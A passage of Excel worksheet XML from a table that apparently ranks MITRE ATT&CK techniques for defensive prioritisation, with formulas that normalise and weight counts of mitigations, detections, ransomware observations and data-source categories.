      <c r="AG6" s="37" t="str" cm="1">
        <f t="array" ref="AG6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD6)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH6" s="37">
        <v>2</v>
      </c>
      <c r="AI6" s="37" t="str" cm="1">
        <f t="array" ref="AI6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD6)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ6" s="37">
        <v>2</v>
      </c>
      <c r="AK6" s="37" t="str" cm="1">
        <f t="array" ref="AK6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD6)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL6" s="37">
        <v>2</v>
      </c>
      <c r="AM6" s="37" t="str" cm="1">
        <f t="array" ref="AM6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD6)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN6" s="37">
        <v>0</v>
      </c>
      <c r="AO6" s="37">
        <v>0</v>
      </c>
      <c r="AP6" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.1671426857142857</v>
      </c>
      <c r="AQ6" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.5571422857142857</v>
      </c>
      <c r="AR6" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.5571422857142857</v>
      </c>
      <c r="AS6" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT6" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU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7" spans="1:47" ht="17">
      <c r="A7" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.29952356190476193</v>
      </c>
      <c r="B7" s="37">
        <f t="shared" si="0"/>
        <v>2.661902285714286</v>
      </c>
      <c r="C7" s="37" t="s">
        <v>80</v>
      </c>
      <c r="D7" s="50" t="s">
        <v>71</v>
      </c>
      <c r="E7" s="37" t="s">
        <v>81</v>
      </c>
      <c r="F7" s="37">
        <v>1</v>
      </c>
      <c r="G7" s="37">
        <v>1</v>
      </c>
      <c r="H7" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I7" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J7" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K7" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L7" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M7" s="37">
        <v>0</v>
      </c>
      <c r="N7" s="56">
        <v>0</v>
      </c>
      <c r="O7" s="56">
        <v>3</v>
      </c>
      <c r="P7" s="56">
        <v>0</v>
      </c>
      <c r="Q7" s="56">
        <v>1</v>
      </c>
      <c r="R7" s="57" t="s">
        <v>73</v>
      </c>
      <c r="S7" s="57">
        <v>2</v>
      </c>
      <c r="T7" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U7" s="57">
        <v>7</v>
      </c>
      <c r="V7" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476171428571429</v>
      </c>
      <c r="W7" s="37">
        <v>9</v>
      </c>
      <c r="X7" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y7" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z7" s="37">
        <v>4</v>
      </c>
      <c r="AA7" s="37">
        <v>0.04</v>
      </c>
      <c r="AB7" s="37">
        <v>0.04</v>
      </c>
      <c r="AC7" s="37"/>
      <c r="AD7" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE7" s="37" t="str" cm="1">
        <f t="array" ref="AE7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD7)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF7" s="37">
        <v>3</v>
      </c>
      <c r="AG7" s="37" t="str" cm="1">
        <f t="array" ref="AG7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD7)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH7" s="37">
        <v>3</v>
      </c>
      <c r="AI7" s="37" t="str" cm="1">
        <f t="array" ref="AI7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD7)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ7" s="37">
        <v>3</v>
      </c>
      <c r="AK7" s="37" t="str" cm="1">
        <f t="array" ref="AK7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD7)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL7" s="37">
        <v>3</v>
      </c>
      <c r="AM7" s="37" t="str" cm="1">
        <f t="array" ref="AM7">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD7)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN7" s="37">
        <v>0</v>
      </c>
      <c r="AO7" s="37">
        <v>1</v>
      </c>
      <c r="AP7" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.29952356190476193</v>
      </c>
      <c r="AQ7" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.88730076190476204</v>
      </c>
      <c r="AR7" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.88730076190476204</v>
      </c>
      <c r="AS7" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT7" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU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4.4935732426303859E-2</v>
      </c>
    </row>
    <row r="8" spans="1:47" ht="119">
      <c r="A8" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B8" s="37">
        <f t="shared" si="0"/>
        <v>24.825636714285714</v>
      </c>
      <c r="C8" s="37" t="s">
        <v>82</v>
      </c>
      <c r="D8" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E8" s="37"/>
      <c r="F8" s="37">
        <v>1</v>
      </c>
      <c r="G8" s="37">
        <v>5</v>
      </c>
      <c r="H8" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="I8" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J8" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K8" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L8" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M8" s="37">
        <v>0.32699800000000001</v>
      </c>
      <c r="N8" s="56">
        <v>0</v>
      </c>
      <c r="O8" s="56">
        <v>23</v>
      </c>
      <c r="P8" s="56">
        <v>34</v>
      </c>
      <c r="Q8" s="56">
        <v>36</v>
      </c>
      <c r="R8" s="57" t="s">
        <v>84</v>
      </c>
      <c r="S8" s="57">
        <v>19</v>
      </c>
      <c r="T8" s="57" t="s">
        <v>85</v>
      </c>
      <c r="U8" s="57">
        <v>22</v>
      </c>
      <c r="V8" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.83333357142857145</v>
      </c>
      <c r="W8" s="37">
        <v>41</v>
      </c>
      <c r="X8" s="37">
        <v>0.74545499999999998</v>
      </c>
      <c r="Y8" s="37">
        <v>0.74545499999999998</v>
      </c>
      <c r="Z8" s="37">
        <v>93</v>
      </c>
      <c r="AA8" s="37">
        <v>0.93</v>
      </c>
      <c r="AB8" s="37">
        <v>0.93</v>
      </c>
      <c r="AC8" s="37"/>
      <c r="AD8" s="50" t="s">
        <v>86</v>
      </c>
      <c r="AE8" s="37" t="str" cm="1">
        <f t="array" ref="AE8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD8)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF8" s="37">
        <v>4</v>
      </c>
      <c r="AG8" s="37" t="str" cm="1">
        <f t="array" ref="AG8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD8)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH8" s="37">
        <v>4</v>
      </c>
      <c r="AI8" s="37" t="str" cm="1">
        <f t="array" ref="AI8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD8)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ8" s="37">
        <v>4</v>
      </c>
      <c r="AK8" s="37" t="str" cm="1">
        <f t="array" ref="AK8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD8)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL8" s="37">
        <v>4</v>
      </c>
      <c r="AM8" s="37" t="str" cm="1">
        <f t="array" ref="AM8">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD8)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN8" s="37">
        <v>0</v>
      </c>
      <c r="AO8" s="37">
        <v>5</v>
      </c>
      <c r="AP8" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ8" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.2752122380952375</v>
      </c>
      <c r="AR8" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS8" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT8" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU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1.1041919331065759</v>
      </c>
    </row>
    <row r="9" spans="1:47" ht="51">
      <c r="A9" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B9" s="37">
        <f t="shared" si="0"/>
        <v>19.100003999999998</v>
      </c>
      <c r="C9" s="37" t="s">
        <v>87</v>
      </c>
      <c r="D9" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E9" s="37" t="s">
        <v>88</v>
      </c>
      <c r="F9" s="37">
        <v>1</v>
      </c>
      <c r="G9" s="37">
        <v>1</v>
      </c>
      <c r="H9" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I9" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J9" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K9" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L9" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M9" s="37">
        <v>0</v>
      </c>
      <c r="N9" s="56">
        <v>5</v>
      </c>
      <c r="O9" s="56">
        <v>75</v>
      </c>
      <c r="P9" s="56">
        <v>10</v>
      </c>
      <c r="Q9" s="56">
        <v>14</v>
      </c>
      <c r="R9" s="57" t="s">
        <v>89</v>
      </c>
      <c r="S9" s="57">
        <v>16</v>
      </c>
      <c r="T9" s="57" t="s">
        <v>90</v>
      </c>
      <c r="U9" s="57">
        <v>19</v>
      </c>
      <c r="V9" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.80952400000000002</v>
      </c>
      <c r="W9" s="37">
        <v>35</v>
      </c>
      <c r="X9" s="37">
        <v>0.63636400000000004</v>
      </c>
      <c r="Y9" s="37">
        <v>0.63636400000000004</v>
      </c>
      <c r="Z9" s="37">
        <v>104</v>
      </c>
      <c r="AA9" s="37">
        <v>1.04</v>
      </c>
      <c r="AB9" s="37">
        <v>1</v>
      </c>
      <c r="AC9" s="37"/>
      <c r="AD9" s="50" t="s">
        <v>91</v>
      </c>
      <c r="AE9" s="37" t="str" cm="1">
        <f t="array" ref="AE9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD9)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF9" s="37">
        <v>5</v>
      </c>
      <c r="AG9" s="37" t="str" cm="1">
        <f t="array" ref="AG9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD9)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH9" s="37">
        <v>5</v>
      </c>
      <c r="AI9" s="37" t="str" cm="1">
        <f t="array" ref="AI9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD9)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ9" s="37">
        <v>5</v>
      </c>
      <c r="AK9" s="37" t="str" cm="1">
        <f t="array" ref="AK9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD9)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL9" s="37">
        <v>5</v>
      </c>
      <c r="AM9" s="37" t="str" cm="1">
        <f t="array" ref="AM9">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD9)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN9" s="37">
        <v>0</v>
      </c>
      <c r="AO9" s="37">
        <v>1</v>
      </c>
      <c r="AP9" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ9" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.3666679999999998</v>
      </c>
      <c r="AR9" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS9" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT9" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU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0.17539685714285713</v>
      </c>
    </row>
    <row r="10" spans="1:47" ht="34">
      <c r="A10" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B10" s="37">
        <f t="shared" si="0"/>
        <v>14.761910714285714</v>
      </c>
      <c r="C10" s="37" t="s">
        <v>92</v>
      </c>
      <c r="D10" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E10" s="37" t="s">
        <v>93</v>
      </c>
      <c r="F10" s="37">
        <v>1</v>
      </c>
      <c r="G10" s="37">
        <v>1</v>
      </c>
      <c r="H10" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I10" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J10" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K10" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L10" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M10" s="37">
        <v>0</v>
      </c>
      <c r="N10" s="56">
        <v>1</v>
      </c>
      <c r="O10" s="56">
        <v>28</v>
      </c>
      <c r="P10" s="56">
        <v>5</v>
      </c>
      <c r="Q10" s="56">
        <v>9</v>
      </c>
      <c r="R10" s="57" t="s">
        <v>94</v>
      </c>
      <c r="S10" s="57">
        <v>15</v>
      </c>
      <c r="T10" s="57" t="s">
        <v>95</v>
      </c>
      <c r="U10" s="57">
        <v>15</v>
      </c>
      <c r="V10" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.49047642857142859</v>
      </c>
      <c r="W10" s="37">
        <v>30</v>
      </c>
      <c r="X10" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Y10" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Z10" s="37">
        <v>43</v>
      </c>
      <c r="AA10" s="37">
        <v>0.43</v>
      </c>
      <c r="AB10" s="37">
        <v>0.43</v>
      </c>
      <c r="AC10" s="37"/>
      <c r="AD10" s="50" t="s">
        <v>96</v>
      </c>
      <c r="AE10" s="37" t="str" cm="1">
        <f t="array" ref="AE10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD10)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF10" s="37">
        <v>6</v>
      </c>
      <c r="AG10" s="37" t="str" cm="1">
        <f t="array" ref="AG10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD10)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH10" s="37">
        <v>6</v>
      </c>
      <c r="AI10" s="37" t="str" cm="1">
        <f t="array" ref="AI10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD10)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ10" s="37">
        <v>6</v>
      </c>
      <c r="AK10" s="37" t="str" cm="1">
        <f t="array" ref="AK10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD10)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL10" s="37">
        <v>6</v>
      </c>
      <c r="AM10" s="37" t="str" cm="1">
        <f t="array" ref="AM10">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD10)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN10" s="37">
        <v>0</v>
      </c>
      <c r="AO10" s="37">
        <v>1</v>
      </c>
      <c r="AP10" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ10" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.9206369047619045</v>
      </c>
      <c r="AR10" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS10" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT10" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU1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0.14096754535147391</v>
      </c>
    </row>
    <row r="11" spans="1:47" ht="17">
      <c r="A11" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B11" s="37">
        <f t="shared" si="0"/>
        <v>15.88094961904762</v>
      </c>
      <c r="C11" s="37" t="s">
        <v>97</v>
      </c>
      <c r="D11" s="50" t="s">
        <v>83</v>
      </c>
      <c r="E11" s="37" t="s">
        <v>98</v>
      </c>
      <c r="F11" s="37">
        <v>1</v>
      </c>
      <c r="G11" s="37">
        <v>1</v>
      </c>
      <c r="H11" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I11" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J11" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K11" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L11" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M11" s="37">
        <v>0</v>
      </c>
      <c r="N11" s="56">
        <v>2</v>
      </c>
      <c r="O11" s="56">
        <v>19</v>
      </c>
      <c r="P11" s="56">
        <v>1</v>
      </c>
      <c r="Q11" s="56">
        <v>8</v>
      </c>
      <c r="R11" s="57" t="s">
        <v>99</v>
      </c>
      <c r="S11" s="57">
        <v>14</v>
      </c>
      <c r="T11" s="57" t="s">
        <v>100</v>
      </c>
      <c r="U11" s="57">
        <v>18</v>
      </c>
      <c r="V11" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.44761895238095234</v>
      </c>
      <c r="W11" s="37">
        <v>32</v>
      </c>
      <c r="X11" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y11" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z11" s="37">
        <v>30</v>
      </c>
      <c r="AA11" s="37">
        <v>0.3</v>
      </c>
      <c r="AB11" s="37">
        <v>0.3</v>
      </c>
      <c r="AC11" s="37"/>
      <c r="AD11" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE11" s="37" t="str" cm="1">
        <f t="array" ref="AE11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD11)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF11" s="37">
        <v>7</v>
      </c>
      <c r="AG11" s="37" t="str" cm="1">
        <f t="array" ref="AG11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD11)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH11" s="37">
        <v>7</v>
      </c>
      <c r="AI11" s="37" t="str" cm="1">
        <f t="array" ref="AI11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD11)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ11" s="37">
        <v>7</v>
      </c>
      <c r="AK11" s="37" t="str" cm="1">
        <f t="array" ref="AK11">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD11)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL11" s="37">
        <v>7</v>
      </c>
